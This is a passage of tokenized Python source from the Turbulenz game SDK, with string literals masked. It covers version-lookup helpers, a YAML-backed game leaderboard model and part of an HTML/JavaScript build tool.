[ sysname ] <EOL> this_os = data [ os ] <EOL> latest_version = this_os [ '<STR_LIT>' ] <EOL> all_versions = this_os [ '<STR_LIT>' ] <EOL> if all_versions : <EOL> latest_link = '<STR_LIT>' % all_versions [ latest_version ] [ '<STR_LIT:file>' ] <EOL> else : <EOL> latest_link = '<STR_LIT>' <EOL> latest_version = '<STR_LIT>' <EOL> return { <EOL> '<STR_LIT>' : latest_version , <EOL> '<STR_LIT>' : SDK_VERSION , <EOL> '<STR_LIT>' : latest_link <EOL> } <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : SDK_VERSION , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def turbulenz_engine_version ( engine_version ) : <EOL> query = turbulenz_api ( engine_version ) <EOL> plugin_data = { } <EOL> if query . get ( '<STR_LIT>' , False ) : <EOL> data = query . get ( '<STR_LIT:data>' , None ) <EOL> if data : <EOL> os_list = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for o in os_list : <EOL> this_os = data [ o ] <EOL> latest_plugin_version = this_os [ '<STR_LIT>' ] <EOL> all_versions = this_os [ '<STR_LIT>' ] <EOL> if all_versions : <EOL> latest_plugin_link = all_versions [ latest_plugin_version ] [ '<STR_LIT:file>' ] <EOL> else : <EOL> latest_plugin_link = '<STR_LIT>' <EOL> latest_plugin_version = '<STR_LIT>' <EOL> os_data = { <EOL> '<STR_LIT>' : latest_plugin_version , <EOL> '<STR_LIT>' : latest_plugin_link <EOL> } <EOL> plugin_data [ o ] = os_data <EOL> return plugin_data <EOL> def _load_yaml_mapping ( filename ) : <EOL> try : <EOL> f = open ( filename ) <EOL> try : <EOL> yaml_versions = yaml_load ( f ) <EOL> finally : <EOL> f . close ( ) <EOL> except IOError : <EOL> yaml_versions = { } <EOL> return yaml_versions <EOL> class Helpers ( object ) : <EOL> def __init__ ( self , config ) : <EOL> self . sdk_data = turbulenz_sdk_version ( config [ '<STR_LIT>' ] ) <EOL> self . plugin_data = turbulenz_engine_version ( config [ '<STR_LIT>' ] ) <EOL> self . gravatars_style = config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if asbool ( config . get ( '<STR_LIT>' , False ) ) : <EOL> self . js_mapping = { } <EOL> self . css_mapping = { } <EOL> self . html_mapping = { } <EOL> else : <EOL> self . js_mapping = _load_yaml_mapping ( path_join ( CONFIG_PATH , '<STR_LIT>' ) ) <EOL> self . css_mapping = _load_yaml_mapping ( path_join ( CONFIG_PATH , '<STR_LIT>' ) ) <EOL> self . html_mapping = _load_yaml_mapping ( path_join ( CONFIG_PATH , '<STR_LIT>' ) ) <EOL> self . deploy_enable = asbool ( config . get ( '<STR_LIT>' , False ) ) <EOL> self . deploy_host = config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . deploy_port = asint ( config . get ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> self . viewer_app = config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def javascript_link ( self , url ) : <EOL> url = self . js_mapping . get ( url , url ) <EOL> return '<STR_LIT>' % url <EOL> def javascript_url ( self , url ) : <EOL> return self . js_mapping . get ( url , url ) <EOL> def stylesheet_link ( self , url ) : <EOL> url = self . css_mapping . get ( url , url ) <EOL> return '<STR_LIT>' % url <EOL> def stylesheet_url ( self , url ) : <EOL> return self . css_mapping . get ( url , url ) <EOL> def html_url ( self , url ) : <EOL> return self . html_mapping . get ( url , url ) <EOL> def gravatar_url ( self , name , style = None , size = <NUM_LIT:100> ) : <EOL> if not style : <EOL> style = self . gravatars_style <EOL> return '<STR_LIT>' % ( md5 ( name ) . hexdigest ( ) , <EOL> urlencode ( { '<STR_LIT:d>' : style , '<STR_LIT:s>' : str ( size ) } ) ) <EOL> @ classmethod <EOL> def search_order ( cls , match , default = False ) : <EOL> value = request . params . get ( '<STR_LIT>' ) <EOL> if value == match : <EOL> return '<STR_LIT>' <EOL> if not value and default : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> @ classmethod <EOL> def search_keywords ( cls ) : <EOL> return request . params . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def sdk_info ( self ) : <EOL> return json . JSONEncoder ( ) . encode ( self . sdk_data ) <EOL> def plugin_info ( self ) : <EOL> return json . JSONEncoder ( ) . encode ( self . plugin_data ) <EOL> def viewer_enabled ( self ) : <EOL> game = get_game_by_slug ( self . viewer_app ) <EOL> return '<STR_LIT:true>' if game else '<STR_LIT:false>' <EOL> @ classmethod <EOL> def sort_order ( cls , order ) : <EOL> classes = [ ] <EOL> if order is not None and order == request . params . get ( '<STR_LIT>' , None ) : <EOL> classes . append ( '<STR_LIT>' ) <EOL> if request . params . get ( '<STR_LIT>' , False ) : <EOL> classes . append ( '<STR_LIT>' ) <EOL> if classes : <EOL> return '<STR_LIT>' % '<STR_LIT:U+0020>' . join ( classes ) <EOL> return '<STR_LIT>' <EOL> @ classmethod <EOL> def slugify ( cls , s ) : <EOL> return slugify_fn ( s ) <EOL> def make_helpers ( config ) : <EOL> return Helpers ( config ) </s>
<s> import logging <EOL> LOG = logging . getLogger ( __name__ ) <EOL> from re import compile as regex_compile <EOL> from time import time as time_now <EOL> from os . path import exists as path_exists , join as join_path , splitext <EOL> from math import floor , ceil , isinf , isnan <EOL> from threading import Lock <EOL> from pylons import config <EOL> import yaml <EOL> from turbulenz_local . tools import get_absolute_path , create_dir <EOL> from turbulenz_local . lib . validation import ValidationException <EOL> from turbulenz_local . models . userlist import get_user <EOL> REQUIRED_LEADERBOARD_KEYS = [ '<STR_LIT:key>' , '<STR_LIT:title>' ] <EOL> class LeaderboardError ( Exception ) : <EOL> def __init__ ( self , value , response_code = <NUM_LIT> ) : <EOL> super ( LeaderboardError , self ) . __init__ ( ) <EOL> self . value = value <EOL> self . response_code = response_code <EOL> def __str__ ( self ) : <EOL> return self . value <EOL> class LeaderboardsUnsupported ( LeaderboardError ) : <EOL> def __init__ ( self ) : <EOL> super ( LeaderboardsUnsupported , self ) . __init__ ( '<STR_LIT>' , <NUM_LIT> ) <EOL> class UserScore ( object ) : <EOL> def __init__ ( self , username , score , score_time ) : <EOL> self . user = username <EOL> self . score = score <EOL> self . score_time = score_time <EOL> def copy ( self ) : <EOL> return UserScore ( self . user , self . score , self . score_time ) <EOL> def to_dict ( self ) : <EOL> return { '<STR_LIT:user>' : self . user , <EOL> '<STR_LIT>' : self . score , <EOL> '<STR_LIT:time>' : self . score_time } <EOL> class Leaderboard ( object ) : <EOL> validate_key = regex_compile ( '<STR_LIT>' ) <EOL> def __init__ ( self , game , key , meta_data , index ) : <EOL> self . user_scores = { } <EOL> self . scores = [ ] <EOL> self . aggregate = False <EOL> self . aggregate_score = <NUM_LIT:0> <EOL> self . lock = Lock ( ) <EOL> self . errors = [ ] <EOL> self . warnings = [ ] <EOL> self . path = None <EOL> def error ( msg ) : <EOL> self . errors . append ( msg ) <EOL> def warning ( msg ) : <EOL> self . warnings . append ( msg ) <EOL> if not self . validate_key . match ( key ) : <EOL> error ( '<STR_LIT>' % key ) <EOL> self . key = key <EOL> self . index = index <EOL> if '<STR_LIT:title>' not in meta_data or meta_data [ '<STR_LIT:title>' ] is None : <EOL> error ( '<STR_LIT>' % key ) <EOL> self . title = '<STR_LIT>' <EOL> else : <EOL> self . title = meta_data [ '<STR_LIT:title>' ] <EOL> if '<STR_LIT>' in meta_data : <EOL> if isinstance ( meta_data [ '<STR_LIT>' ] , bool ) : <EOL> self . aggregate = meta_data [ '<STR_LIT>' ] <EOL> else : <EOL> warning ( '<STR_LIT>' % key ) <EOL> self . aggregate = False <EOL> else : <EOL> self . aggregate = False <EOL> try : <EOL> sort_by = int ( meta_data [ '<STR_LIT>' ] ) <EOL> if sort_by != - <NUM_LIT:1> and sort_by != <NUM_LIT:1> : <EOL> error ( '<STR_LIT>' % key ) <EOL> except KeyError : <EOL> warning ( '<STR_LIT>' % key ) <EOL> sort_by = <NUM_LIT:1> <EOL> except ValueError : <EOL> error ( '<STR_LIT>' % key ) <EOL> sort_by = <NUM_LIT:1> <EOL> self . sort_by = sort_by <EOL> if '<STR_LIT>' in meta_data : <EOL> warning ( '<STR_LIT>' <EOL> '<STR_LIT>' % key ) <EOL> try : <EOL> icon_path = meta_data [ '<STR_LIT>' ] <EOL> if path_exists ( get_absolute_path ( join_path ( game . path , icon_path ) ) ) : <EOL> if splitext ( icon_path ) [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> warning ( '<STR_LIT>' % key ) <EOL> else : <EOL> error ( '<STR_LIT>' % key ) <EOL> except KeyError : <EOL> warning ( '<STR_LIT>' % key ) <EOL> self . game = game <EOL> self . default_scores = [ ] <EOL> default_scores = meta_data . get ( '<STR_LIT>' , [ ] ) <EOL> for ( i , s ) in enumerate ( default_scores ) : <EOL> if not isinstance ( s , dict ) : <EOL> warning ( '<STR_LIT>' % key ) <EOL> continue <EOL> user = s . get ( '<STR_LIT:user>' , None ) <EOL> if user is None : <EOL> email = s . get ( '<STR_LIT:email>' , None ) <EOL> if email is None : <EOL> warning ( '<STR_LIT>' % key ) <EOL> continue <EOL> try : <EOL> user = email . split ( '<STR_LIT:@>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if user . startswith ( '<STR_LIT>' ) : <EOL> user = user [ <NUM_LIT:9> : ] <EOL> except AttributeError : <EOL> warning ( '<STR_LIT>' % ( email , key ) ) <EOL> continue <EOL> if '<STR_LIT>' in s : <EOL> try : <EOL> score = float ( s [ '<STR_LIT>' ] ) <EOL> if isinf ( score ) or isnan ( score ) : <EOL> warning ( '<STR_LIT>' % ( user , key ) ) <EOL> continue <EOL> user_score = UserScore ( user , score , time_now ( ) - i ) <EOL> self . default_scores . append ( user_score ) <EOL> except ( ValueError , TypeError ) : <EOL> warning ( '<STR_LIT>' % ( user , key ) ) <EOL> continue <EOL> else : <EOL> warning ( '<STR_LIT>' % ( user , key ) ) <EOL> continue <EOL> def to_dict ( self ) : <EOL> return { '<STR_LIT:key>' : self . key , <EOL> '<STR_LIT:index>' : self . index , <EOL> '<STR_LIT:title>' : self . title , <EOL> '<STR_LIT>' : self . sort_by } <EOL> def _set_path ( self ) : <EOL> if not self . path : <EOL> try : <EOL> path = config [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> return <EOL> path = join_path ( path , self . game . slug ) <EOL> if not create_dir ( path ) : <EOL> LOG . error ( '<STR_LIT>' , path ) <EOL> self . path = join_path ( path , self . key + '<STR_LIT>' ) <EOL> def _add_score ( self , user_score ) : <EOL> self . user_scores [ user_score . user ] = user_score <EOL> self . scores . append ( user_score ) <EOL> if self . aggregate : <EOL> self . aggregate_score += user_score . score <EOL> def _read_leaderboard ( self ) : <EOL> self . _set_path ( ) <EOL> with self . lock : <EOL> self . user_scores = { } <EOL> self . scores = [ ] <EOL> self . aggregate_score = <NUM_LIT:0> <EOL> unicode_path = unicode ( self . path ) <EOL> if path_exists ( unicode_path ) : <EOL> try : <EOL> try : <EOL> f = open ( unicode_path , '<STR_LIT:r>' ) <EOL> file_leaderboard = yaml . load ( f ) <EOL> if file_leaderboard : <EOL> for s in file_leaderboard : <EOL> self . _add_score ( UserScore ( s [ '<STR_LIT:user>' ] , s [ '<STR_LIT>' ] , s [ '<STR_LIT:time>' ] ) ) <EOL> finally : <EOL> f . close ( ) <EOL> except ( IOError , KeyError , yaml . YAMLError ) as e : <EOL> LOG . error ( '<STR_LIT>' , self . path , str ( e ) ) <EOL> raise LeaderboardError ( '<STR_LIT>' % ( self . path , str ( e ) ) ) <EOL> else : <EOL> self . user_scores = { } <EOL> self . scores = [ ] <EOL> for s in self . default_scores : <EOL> username = s . user <EOL> if username not in self . user_scores : <EOL> self . _add_score ( s . copy ( ) ) <EOL> self . _sort_scores ( ) <EOL> def _write_leaderboard ( self ) : <EOL> self . _sort_scores ( ) <EOL> try : <EOL> self . _set_path ( ) <EOL> with self . lock : <EOL> try : <EOL> f = open ( unicode ( self . path ) , '<STR_LIT:w>' ) <EOL> yaml . dump ( [ s . to_dict ( ) for s in self . scores ] , f , default_flow_style = False ) <EOL> finally : <EOL> f . close ( ) <EOL> except IOError as e : <EOL> LOG . error ( '<STR_LIT>' , self . path , str ( e ) ) <EOL> raise LeaderboardError ( '<STR_LIT>' % self . path ) <EOL> def _empty_leaderboard ( self ) : <EOL> self . scores = [ ] <EOL> self . user_scores = { } <EOL> self . aggregate_score = <NUM_LIT:0> <EOL> self . _set_path ( ) <EOL> unicode_path = unicode ( self . path ) <EOL> if not path_exists ( unicode_path ) : <EOL> return <EOL> with self . lock : <EOL> try : <EOL> f = open ( unicode_path , '<STR_LIT:w>' ) <EOL> f . close ( ) <EOL> except IOError as e : <EOL> LOG . error ( '<STR_LIT>' , self . path , str ( e ) ) <EOL> raise LeaderboardError ( '<STR_LIT>' % self . path ) <EOL> def _sort_scores ( self ) : <EOL> self . scores . sort ( key = lambda s : ( - self . sort_by * s . score , s . score_time ) ) <EOL> def _rank_leaderboard ( self , leaderboard , top_rank ) : <EOL> length = len ( leaderboard ) <EOL> if length == <NUM_LIT:0> : <EOL> return <EOL> leaderboard . sort ( key = lambda r : ( - self . sort_by * r [ '<STR_LIT>' ] , r [ '<STR_LIT:time>' ] ) ) <EOL> num_top = top_rank [ <NUM_LIT:1> ] <EOL> prev_rank = top_rank [ <NUM_LIT:0> ] <EOL> rank = prev_rank + num_top <EOL> top_score = leaderboard [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> prev_score = top_score <EOL> for i in xrange ( length ) : <EOL> r = leaderboard [ i ] <EOL> score = r [ '<STR_LIT>' ] <EOL> if score != prev_score : <EOL> prev_score = score <EOL> prev_rank = rank <EOL> r [ '<STR_LIT>' ] = prev_rank <EOL> if score != top_score : <EOL> rank += <NUM_LIT:1> <EOL> @ classmethod <EOL> def _get_row ( cls , username , score ) : <EOL> user = get_user ( username ) <EOL> return { '<STR_LIT:user>' : <EOL> { <EOL> '<STR_LIT:username>' : username , <EOL> '<STR_LIT>' : username , <EOL> '<STR_LIT>' : user . avatar <EOL> } , <EOL> '<STR_LIT>' : score . score , <EOL> '<STR_LIT:time>' : score . score_time } <EOL> def _get_user_row ( self , user ) : <EOL> username = user . username <EOL> if username in self . user_scores : <EOL> return self . _get_row ( username , self . user_scores [ username ] ) <EOL> else : <EOL> return None <EOL> def _get_rank ( self , score ) : <EOL> top_rank = <NUM_LIT:1> <EOL> count = <NUM_LIT:0> <EOL> for s in self . scores : <EOL> if score == s . score : <EOL> count += <NUM_LIT:1> <EOL> else : <EOL> if count != <NUM_LIT:0> : <EOL> return ( top_rank , count ) <EOL> top_rank += <NUM_LIT:1> <EOL> return ( top_rank , count ) <EOL> @ classmethod <EOL> def create_response ( cls , top , bottom , ranking , player = None ) : <EOL> response = { <EOL> '<STR_LIT>' : top , <EOL> '<STR_LIT>' : bottom , <EOL> '<STR_LIT>' : ranking <EOL> } <EOL> if player is not None : <EOL> response [ '<STR_LIT>' ] = player <EOL> return response <EOL> def get_top_players ( self , user , num_top_players ) : <EOL> self . _read_leaderboard ( ) <EOL> scores = self . scores <EOL> leaderboard = [ ] <EOL> player = None <EOL> try : <EOL> for i in xrange ( num_top_players ) : <EOL> s = scores [ i ] <EOL> username = s . user <EOL> row = self . _get_row ( username , s ) <EOL> if username == user . username : <EOL> player = row <EOL> leaderboard . append ( row ) <EOL> except IndexError : <EOL> pass <EOL> if player is None : <EOL> player = self . _get_user_row ( user ) <EOL> if len ( leaderboard ) > <NUM_LIT:0> : <EOL> self . _rank_leaderboard ( leaderboard , self . _get_rank ( leaderboard [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) ) <EOL> bottom = len ( scores ) <= num_top_players <EOL> return self . create_response ( True , bottom , leaderboard , player ) <EOL> def get_page ( self , user , max_page_size , is_above , score , score_time ) : <EOL> self . _read_leaderboard ( ) <EOL> scores = self . scores <EOL> leaderboard = [ ] <EOL> player = None <EOL> query_complete = False <EOL> if not is_above : <EOL> scores = reversed ( scores ) <EOL> for s in scores : <EOL> if is_above : <EOL> if self . sort_by * s . score < self . sort_by * score or ( s . score == score and s . score_time >= score_time ) : <EOL> query_complete = True <EOL> else : <EOL> if self . sort_by * s . score > self . sort_by * score or ( s . score == score and s . score_time <= score_time ) : <EOL> query_complete = True <EOL> if query_complete and len ( leaderboard ) >= max_page_size : <EOL> break <EOL> username = s . user <EOL> row = self . _get_row ( username , s ) <EOL> if username == user . username : <EOL> player = row <EOL> leaderboard . append ( row ) <EOL> leaderboard = leaderboard [ - max_page_size : ] <EOL> if not is_above : <EOL> leaderboard = list ( reversed ( leaderboard ) ) <EOL> if player is None : <EOL> player = self . _get_user_row ( user ) <EOL> if len ( leaderboard ) > <NUM_LIT:0> : <EOL> self . _rank_leaderboard ( leaderboard , self . _get_rank ( leaderboard [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) ) <EOL> top = ( self . scores [ <NUM_LIT:0> ] . user == leaderboard [ <NUM_LIT:0> ] [ '<STR_LIT:user>' ] [ '<STR_LIT:username>' ] ) <EOL> bottom = ( self . scores [ - <NUM_LIT:1> ] . user == leaderboard [ - <NUM_LIT:1> ] [ '<STR_LIT:user>' ] [ '<STR_LIT:username>' ] ) <EOL> else : <EOL> top = True <EOL> bottom = True <EOL> return self . create_response ( top , bottom , leaderboard , player ) <EOL> def get_near ( self , user , size ) : <EOL> self . _read_leaderboard ( ) <EOL> scores = self . scores <EOL> if len ( scores ) == <NUM_LIT:0> : <EOL> return self . create_response ( True , True , [ ] ) <EOL> if not user . username in self . user_scores : <EOL> return self . get_top_players ( user , size ) <EOL> index = None <EOL> for i , r in enumerate ( scores ) : <EOL> if r . user == user . username : <EOL> index = i <EOL> break <EOL> start = index - int ( floor ( size * <NUM_LIT:0.5> ) ) <EOL> end = index + int ( ceil ( size * <NUM_LIT:0.5> ) ) <EOL> num_scores = len ( scores ) <EOL> if start < <NUM_LIT:0> : <EOL> end -= start <EOL> start = <NUM_LIT:0> <EOL> if end > num_scores : <EOL> end = num_scores <EOL> elif end > num_scores : <EOL> start -= ( end - num_scores ) <EOL> end = num_scores <EOL> if start < <NUM_LIT:0> : <EOL> start = <NUM_LIT:0> <EOL> leaderboard = [ ] <EOL> player = None <EOL> for i in xrange ( start , end , <NUM_LIT:1> ) : <EOL> s = scores [ i ] <EOL> username = s . user <EOL> row = self . _get_row ( username , s ) <EOL> if username == user . username : <EOL> player = row <EOL> leaderboard . append ( row ) <EOL> if player is None : <EOL> player = self . _get_user_row ( user ) <EOL> self . _rank_leaderboard ( leaderboard , self . _get_rank ( leaderboard [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) ) <EOL> top = ( start == <NUM_LIT:0> ) <EOL> bottom = ( end == num_scores ) <EOL> return self . create_response ( top , bottom , leaderboard , player ) <EOL> def read_overview ( self , user ) : <EOL> self . _read_leaderboard ( ) <EOL> try : <EOL> users_score = self . user_scores [ user . username ] <EOL> score = users_score . score <EOL> rank = self . _get_rank ( score ) [ <NUM_LIT:0> ] <EOL> return { '<STR_LIT:key>' : self . key , <EOL> '<STR_LIT>' : score , <EOL> '<STR_LIT>' : rank , <EOL> '<STR_LIT:time>' : users_score . score_time } <EOL> except KeyError : <EOL> return None <EOL> def read_aggregates ( self ) : <EOL> self . _read_leaderboard ( ) <EOL> if self . aggregate : <EOL> return { <EOL> '<STR_LIT:key>' : self . key , <EOL> '<STR_LIT>' : self . aggregate_score , <EOL> '<STR_LIT>' : len ( self . scores ) <EOL> } <EOL> return None <EOL> def set ( self , user , new_score ) : <EOL> score_time = time_now ( ) <EOL> self . _read_leaderboard ( ) <EOL> try : <EOL> users_score = self . user_scores [ user . username ] <EOL> old_score = users_score . score <EOL> if ( self . sort_by == <NUM_LIT:1> and old_score >= new_score ) or ( self . sort_by == - <NUM_LIT:1> and old_score <= new_score ) : <EOL> return { '<STR_LIT>' : old_score } <EOL> users_score . score = new_score <EOL> users_score . score_time = score_time <EOL> if self . aggregate : <EOL> self . aggregate_score += new_score - old_score <EOL> self . _write_leaderboard ( ) <EOL> return { '<STR_LIT>' : True , '<STR_LIT>' : old_score } <EOL> except KeyError : <EOL> self . _add_score ( UserScore ( user . username , new_score , score_time ) ) <EOL> self . _write_leaderboard ( ) <EOL> return { '<STR_LIT>' : True } <EOL> def remove ( self ) : <EOL> self . _empty_leaderboard ( ) <EOL> class GameLeaderboards ( object ) : <EOL> def __init__ ( self , game ) : <EOL> self . leaderboards = { } <EOL> self . ordered_leaderboards = [ ] <EOL> self . leaderboard_path = None <EOL> self . issues = [ ] <EOL> yaml_path = unicode ( get_absolute_path ( join_path ( game . path , '<STR_LIT>' ) ) ) <EOL> total_yaml_errors = <NUM_LIT:0> <EOL> if path_exists ( yaml_path ) : <EOL> try : <EOL> f = open ( yaml_path , '<STR_LIT:r>' ) <EOL> try : <EOL> file_meta = yaml . load ( f ) <EOL> for ( i , m ) in enumerate ( file_meta ) : <EOL> key = m [ '<STR_LIT:key>' ] <EOL> leaderboard = Leaderboard ( game , key , m , i ) <EOL> num_errors = len ( leaderboard . errors ) <EOL> if num_errors > <NUM_LIT:0> : <EOL> total_yaml_errors += num_errors <EOL> self . issues . append ( ( key , { <EOL> '<STR_LIT>' : leaderboard . errors , <EOL> '<STR_LIT>' : leaderboard . warnings <EOL> } ) ) <EOL> elif len ( leaderboard . warnings ) > <NUM_LIT:0> : <EOL> self . issues . append ( ( key , { <EOL> '<STR_LIT>' : leaderboard . errors , <EOL> '<STR_LIT>' : leaderboard . warnings <EOL> } ) ) <EOL> self . leaderboards [ key ] = leaderboard <EOL> self . ordered_leaderboards . append ( leaderboard ) <EOL> finally : <EOL> f . close ( ) <EOL> except ( IOError , yaml . YAMLError ) as e : <EOL> LOG . error ( '<STR_LIT>' , str ( e ) ) <EOL> raise LeaderboardError ( '<STR_LIT>' % str ( e ) ) <EOL> else : <EOL> raise LeaderboardsUnsupported ( ) <EOL> if total_yaml_errors > <NUM_LIT:0> : <EOL> raise ValidationException ( self . issues ) <EOL> def _get_leaderboard ( self , key ) : <EOL> try : <EOL> return self . leaderboards [ key ] <EOL> except KeyError : <EOL> raise LeaderboardError ( '<STR_LIT>' % key , <NUM_LIT> ) <EOL> def read_meta ( self ) : <EOL> return [ l . to_dict ( ) for l in self . ordered_leaderboards ] <EOL> def read_overview ( self , user ) : <EOL> result = [ ] <EOL> for l in self . ordered_leaderboards : <EOL> overview = l . read_overview ( user ) <EOL> if overview : <EOL> result . append ( overview ) <EOL> return result <EOL> def read_aggregates ( self ) : <EOL> return [ l . read_aggregates ( ) for l in self . ordered_leaderboards if l . aggregate ] <EOL> def get_top_players ( self , key , user , num_top_players ) : <EOL> return self . _get_leaderboard ( key ) . get_top_players ( user , num_top_players ) <EOL> def get_page ( self , key , user , num_top_players , is_above , score , score_time ) : <EOL> return self . _get_leaderboard ( key ) . get_page ( user , num_top_players , is_above , score , score_time ) <EOL> def get_near ( self , key , user , num_near ) : <EOL> return self . _get_leaderboard ( key ) . get_near ( user , num_near ) <EOL> def set ( self , key , user , score ) : <EOL> return self . _get_leaderboard ( key ) . set ( user , score ) <EOL> def remove_all ( self ) : <EOL> for key in self . leaderboards : <EOL> self . leaderboards [ key ] . remove ( ) <EOL> class LeaderboardsList ( object ) : <EOL> game_leaderboards = { } <EOL> @ classmethod <EOL> def load ( cls , game ) : <EOL> game_leaderboard = GameLeaderboards ( game ) <EOL> cls . game_leaderboards [ game . slug ] = game_leaderboard <EOL> return game_leaderboard <EOL> @ classmethod <EOL> def get ( cls , game ) : <EOL> try : <EOL> return cls . game_leaderboards [ game . slug ] <EOL> except KeyError : <EOL> return cls . load ( game ) <EOL> @ classmethod <EOL> def reset ( cls ) : <EOL> cls . game_leaderboards = { } </s>
<s> from logging import getLogger <EOL> from os . path import splitext , basename <EOL> from optparse import OptionParser , TitledHelpFormatter <EOL> from turbulenz_tools . utils . dependencies import find_dependencies <EOL> from turbulenz_tools . utils . dependencies import find_file_in_dirs <EOL> from turbulenz_tools . utils . profiler import Profiler <EOL> from turbulenz_tools . tools . templates import env_create <EOL> from turbulenz_tools . tools . templates import env_load_template <EOL> from turbulenz_tools . tools . templates import env_load_templates <EOL> from turbulenz_tools . tools . appcodegen import render_js <EOL> from turbulenz_tools . tools . appcodegen import context_from_options <EOL> from turbulenz_tools . tools . appcodegen import default_add_code <EOL> from turbulenz_tools . tools . appcodegen import inject_js_from_options <EOL> from turbulenz_tools . tools . appcodegen import default_parser_options <EOL> from turbulenz_tools . tools . appcodegen import DEFAULT_HTML_TEMPLATE <EOL> from turbulenz_tools . tools . appcodegen import output_dependency_info <EOL> from turbulenz_tools . tools . toolsexception import ToolsException <EOL> from turbulenz_tools . tools . stdtool import simple_options <EOL> __version__ = '<STR_LIT>' <EOL> __dependencies__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> LOG = getLogger ( __name__ ) <EOL> def _parser ( ) : <EOL> parser = OptionParser ( description = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> usage = "<STR_LIT>" , <EOL> formatter = TitledHelpFormatter ( ) ) <EOL> default_parser_options ( parser ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT:store>" , dest = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT:store>" , dest = "<STR_LIT>" , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> dest = "<STR_LIT>" , default = False , <EOL> help = "<STR_LIT>" ) <EOL> return parser <EOL> def check_input ( input_files ) : <EOL> """<STR_LIT>""" <EOL> js_files = [ ] <EOL> html_files = [ ] <EOL> for f in input_files : <EOL> ext = splitext ( f ) [ <NUM_LIT:1> ] <EOL> if ext in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> js_files . append ( f ) <EOL> elif ext in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> html_files . append ( f ) <EOL> else : <EOL> LOG . error ( "<STR_LIT>" , f ) <EOL> exit ( <NUM_LIT:1> ) <EOL> return ( js_files , html_files ) <EOL> def load_html_template ( env , input_html ) : <EOL> if <NUM_LIT:1> == len ( input_html ) : <EOL> return env_load_template ( env , input_html [ <NUM_LIT:0> ] ) <EOL> return env . from_string ( DEFAULT_HTML_TEMPLATE ) <EOL> def dump_default_template ( outfile_name ) : <EOL> if outfile_name is None : <EOL> outfile_name = '<STR_LIT>' <EOL> with open ( outfile_name , "<STR_LIT:wb>" ) as f : <EOL> f . write ( DEFAULT_HTML_TEMPLATE ) <EOL> LOG . info ( "<STR_LIT>" , outfile_name ) <EOL> return <NUM_LIT:0> <EOL> def html_dump_dependencies ( env , options , input_js , input_html ) : <EOL> """<STR_LIT>""" <EOL> outfile_name = options . dependency_file <EOL> if outfile_name is None : <EOL> LOG . error ( "<STR_LIT>" ) <EOL> return <NUM_LIT:1> <EOL> if <NUM_LIT:1> == len ( input_html ) : <EOL> try : <EOL> deps = find_dependencies ( input_html [ <NUM_LIT:0> ] , options . templatedirs , env , <EOL> [ '<STR_LIT:default>' ] ) <EOL> except Exception , e : <EOL> raise ToolsException ( "<STR_LIT>" % str ( e ) ) <EOL> else : <EOL> deps = [ ] <EOL> if options . mode in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> deps += [ find_file_in_dirs ( js , options . templatedirs ) for js in input_js ] <EOL> output_dependency_info ( outfile_name , options . output , deps ) <EOL> return <NUM_LIT:0> <EOL> def html_generate ( env , options , input_js , input_html ) : <EOL> """<STR_LIT>""" <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> template_html = load_html_template ( env , input_html ) <EOL> if template_html is None : <EOL> LOG . error ( "<STR_LIT>" , input_html [ <NUM_LIT:0> ] ) <EOL> exit ( <NUM_LIT:1> ) <EOL> if len ( input_js ) > <NUM_LIT:0> : <EOL> title = input_js [ <NUM_LIT:0> ] <EOL> elif options . codefile : <EOL> title = options . codefile <EOL> elif len ( input_html ) > <NUM_LIT:0> : <EOL> title = input_html [ <NUM_LIT:0> ] <EOL> else : <EOL> title = "<STR_LIT>" <EOL> title = splitext ( basename ( title ) ) [ <NUM_LIT:0> ] <EOL> context = context_from_options ( options , title ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> rendered_js = "<STR_LIT>" <EOL> inc_js = [ ] <EOL> if options . mode in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> inject_js = inject_js_from_options ( options ) <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> templates_js = env_load_templates ( env , input_js ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> ( rendered_js , inc_js ) = render_js ( context , options , templates_js , <EOL> inject_js ) <EOL> default_add_code ( options , context , rendered_js , inc_js ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> Profiler . start ( '<STR_LIT>' ) <EOL> try : <EOL> res = template_html . render ( context ) <EOL> except Exception , e : <EOL> raise ToolsException ( "<STR_LIT>" % ( input_html , e . __class__ . __name__ , str ( e ) ) ) <EOL> try : <EOL> with open ( options . output , "<STR_LIT:wb>" ) as f : <EOL> f . write ( res . encode ( '<STR_LIT:utf-8>' ) ) <EOL> except IOError : <EOL> raise ToolsException ( "<STR_LIT>" % options . output ) <EOL> Profiler . stop ( '<STR_LIT>' ) <EOL> return <NUM_LIT:0> <EOL> def main 